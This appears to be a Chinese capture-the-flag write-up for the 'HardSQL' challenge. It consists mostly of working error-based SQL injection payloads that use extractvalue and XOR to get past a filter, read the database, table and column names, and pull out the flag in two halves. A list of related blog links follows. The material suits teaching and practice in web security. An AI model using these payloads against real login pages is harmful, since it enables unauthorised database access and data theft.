[极客大挑战 2019]HardSQL1

拿到题目,好多类似的,这次估计更难,sql注入漏洞

随便注入一个

估计是被过滤了

2.1我们先去爆数据库:先构造payload:

复制代码
?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(database()))))%23

爆表名

复制代码
?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23

爆列名

复制代码
?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23

flag出来了,但是只有一半,使用right和left

复制代码
/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23

/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23

得到flag

相关推荐
愿时间能学会宽恕4 分钟前
SpringBoot后端开发常用工具详细介绍——SpringSecurity认证用户保证安全
spring boot·后端·安全
Highcharts.js10 小时前
Highcharts 数据源安全最佳实践:保障数据安全,助力可视化可信部署
安全·highcharts
Suckerbin11 小时前
LAMPSecurity: CTF5靶场渗透
笔记·安全·web安全·网络安全
水兵没月11 小时前
解决Win11 安全中心删掉存在隐患的工具
安全
码农101号12 小时前
运维安全04 - iptable的介绍以及使用
安全
行思理16 小时前
linux 安全与防护,全方向讲解
linux·安全·github
深盾安全16 小时前
Flutter框架编译Android程序全攻略:从入门到进阶
安全
房屋安全鉴定检测17 小时前
房屋安全鉴定报告有效期多久
安全·网络安全
心 一17 小时前
Web安全基石:深入理解与防御SQL注入漏洞
sql·安全·web安全
房屋安全鉴定检测18 小时前
房屋安全鉴定需要什么条件
安全·网络安全